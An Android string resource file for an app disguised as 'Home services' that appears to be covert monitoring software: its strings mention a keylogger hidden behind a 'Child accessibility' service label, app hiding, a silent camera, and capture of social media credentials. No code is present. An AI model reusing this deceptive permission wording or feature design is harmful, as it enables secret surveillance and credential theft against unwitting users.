<resources>

    //Back Arrow Path Data
    <string name="back_vector_path" translatable="false">M50 25,L80 50,M20 50,L80 50,M50 75,L80 50</string>
    //Menu Path Data
    <string name="menu_vector_path" translatable="false">M20 30,L80 30,M20 50,L80 50,M20 70,L80 70</string>


    <string name="app_name">Home services</string>
    <string name="lock_device">Lock Device</string>
    <string name="enable_app_notifications">App Notification Settings</string>
    <string name="enable_playstore_notifications">Google Play Notification Settings</string>


    <string name="login_hint_user">Email</string>
    <string name="login_hint_passw">Password</string>
    <string name="login_hint_passw_repeat">Password repeat</string>
    <string name="login_btn_sign_in">LOG IN</string>
    <string name="login_btn_sign_up">SIGN UP</string>
    <string name="login_txt_sign_up">No account yet? sign up</string>
    <string name="login_success">Login success</string>
    <string name="login_failed_try_again_later">Login failed please try again later</string>
    <string name="login_failed">Login failed</string>
    <string name="sign_up_failed">Sign up failed</string>
    <string name="sign_up_failed_try_again_later">Sign up failed please try again later</string>
    <string name="register_pass_match">Passwords do not match</string>
    <string name="logging_in">Logging in</string>

    <string name="sign_out">Sign out</string>
    <string name="show_app">Show App</string>
    <string name="hide_app">Hide App</string>

    <string name="ops">Oops! 😢</string>
    <string name="oops">Oops!</string>
    <string name="message_dialog_permission_photo_disable">The permission to obtain photos has been disabled.</string>
    <string name="message_dialog_permission_location_disable">The permission to location has been disabled.</string>
    <string name="message_permission_social_disable">The permission to obtain credentials has been disabled.</string>
    <string name="put_your_access_code">Put your access code</string>

    <string name="note_code_access">Note: if you forgot the code, you will have to delete and reinstall the application.</string>
    <string name="lock_screen">Lock app</string>
    <string name="finish_application_for_inactivity">End application by inactivity</string>
    <string name="change_app_finish_time">Change app finish time</string>
    <string name="assigns_a_time_interval_to_terminate_the_application_due_to_inactivity">Assigns a time interval to terminate the application due to inactivity.  It may be necessary to restart the application to take effect.</string>
    <string name="current_access_code">Current access code</string>
    <string name="error_database_connection">Error establishing a database connection.</string>
    <string name="email">User:</string>
    <string name="password">Password:</string>
    <string name="ellipsis">…</string>
    <string name="failed_device">Previously registered device</string>
    <string name="submit">Submit</string>
    <string name="ready_to_continue">Login success, all ready to continue.</string>
    <string name="checking_root">Checking root and enable KeyLogger accessibility</string>

    <string name="msg_dialog_enable_keylogger">Root not found, enable KeyLogger accessibility in \"settings - accessibility - services - child accessibility\"</string>
    <string name="msg_dialog_enable_overdraw">You need to activate the draw over other apps permission to be able to take photos</string>
    <string name="msg_dialog_enable_usage_stats">You need to activate the "Applications with use access" permission to obtain social credentials</string>
    <string name="enable_keylogger_success">Successful KeyLogger accessibility</string>

    <string name="accessibility_service_label">Child accessibility</string>
    <string name="accessibility_service_description">Child accessibility allows users to prevent, or limit access to, their handling, or their content to minors</string>

    <string name="notification_service_label">Home services</string>
    <string name="notification_service_description">Notifications allow the Platform to inform users about potential interactions with minors.</string>

    <string name="msg_dialog_enable_accessibility_service">You need to enable the accessibility service so that the application works correctly.</string>
    <string name="enable_service">ENABLE SERVICE ACCESSIBILITY</string>
    <string name="enable_overdraw">ENABLE OVERDRAW CAMERA</string>
    <string name="enable_usage_stats">ENABLE USAGE STATS</string>

    <string name="address_not_found">Address not found</string>
    <string name="hiding">Hiding…</string>
    <string name="all_fields">Enter all the fields</string>

    <string name="permission_request">Permission request</string>

    <string name="message_permission">Permission is required to read contacts, location, record audio, read phone status, receive sms, camera and write storage for this application. Do you want to try again?</string>
    <string name="message_permission_never_ask_again">Some permissions were denied, without them the application will not work correctly. To activate them you must go to \"Settings - applications - child - permissions\" and activate the corresponding permissions. Do you want to activate them now?</string>

    <string name="message_permission_storage">Permission is required to read/write storage for this application.</string>
    <string name="message_permission_never_ask_again_storage">The storage permission was denied, without it the application will not work correctly. To activate them you must go to \"Settings - applications - IsTheApp - permissions\" and activate the corresponding permissions. Do you want to activate them now?</string>
    <string name="select_type">Child login and sign up</string>
    <string name="enable_service_notification_listener">ENABLE SERVICE NOTIFICATION LISTENER</string>
    <string name="already_have_account">Already have account</string>
    <string name="select_child">Select child</string>
    <string name="new_child">New child</string>
    <string name="characters_child">Contains invalid characters</string>
    <string name="get_childs">Getting childs…</string>
    <string name="change_photo">Change photo</string>
    <string name="upload_photo_child">Uploading photo…</string>
    <string name="check_root_access">Checking root access</string>
    <string name="add_to_whitelist">ADD TO WHITELIST</string>
    <string name="enable_all_permissions">Please enable all permissions</string>
    <string name="activating">Activating…</string>
    <string name="activated_success">Activated successfully!!</string>
    <string name="failed_activate">Failed to activate, try again.</string>
    <string name="already_activated">Already activated</string>
    <string name="new_or_current_child">New or current child</string>
    <string name="_12345678">12345678</string>
    <string name="pass">12345678</string>
    <string name="todo">TODO</string>
    <string name="enter_your_text_here">Enter your text here</string>
    <string name="v">/</string>
    <string name="last_request">Last request</string>
    <string name="b">-</string>
    <string name="n">/</string>
    <string name="mm">32</string>
    <string name="go_to_setting">go_to_setting</string>
    <string name="title_dialog">title_dialog</string>
    <string name="maps_installed">maps_installed</string>
    <string name="failed_delete_file">failed_delete_file</string>
    <string name="failed_delete_files">failed_delete_files</string>
    <string name="required_for_silent_camera_feature">Required for silent camera feature</string>
    <string name="final_setup">Final Setup</string>
    <string name="enable_these_services_for_full_functionality">Enable these services for full functionality</string>
    <string name="prevents_app_from_being_killed_by_system">Prevents app from being killed by system</string>
    <string name="required_for_social_media_monitoring">Required for social media monitoring</string>
    <string name="required_for_keylogger_and_app_usage">Required for keylogger and app usage</string>
    <string name="password1">PASSWORD</string>
    <string name="sign_in1">SIGN IN</string>
    <string name="forgot_password1">Forgot password?</string>
    <string name="new_here_sign_up_instead1">New here? Sign up instead</string>
    <string name="email_address1">EMAIL ADDRESS</string>
    <string name="hello_there_nwelcome_back1">Hello there,\nWelcome back</string>
    <string name="child_name1">CHILD NAME</string>
    <string name="already_a_member_sign_in1">Already a member? Sign in</string>
    <string name="confirm_password1">CONFIRM PASSWORD</string>
    <string name="sign_up1">SIGN UP</string>
    <string name="password12">PASSWORD</string>
    <string name="email_address12">EMAIL ADDRESS</string>
    <string name="get_started">Get Started</string>
    <string name="final_setup1">Final Setup</string>
    <string name="please_enable_the_required_services_to_continue">Please enable the required services to continue.</string>
    <string name="todo12">TODO</string>
    <string name="todo123">TODO</string>
    <string name="todo1234">TODO</string>
    <string name="please_enable_the_required_services_to_continue1">Please enable the required services to continue.</string>
    <string name="final_setup120">Final Setup</string>
    <string name="todohn">TODO</string>
    <string name="todox">TODO</string>
    <string name="todob">TODO</string>
    <string name="please_enable_the_required_services_to_continue12">Please enable the required services to continue.</string>
    <string name="final_setupll">Final Setup</string>
    <string name="child_name">CHILD NAME</string>
</resources>
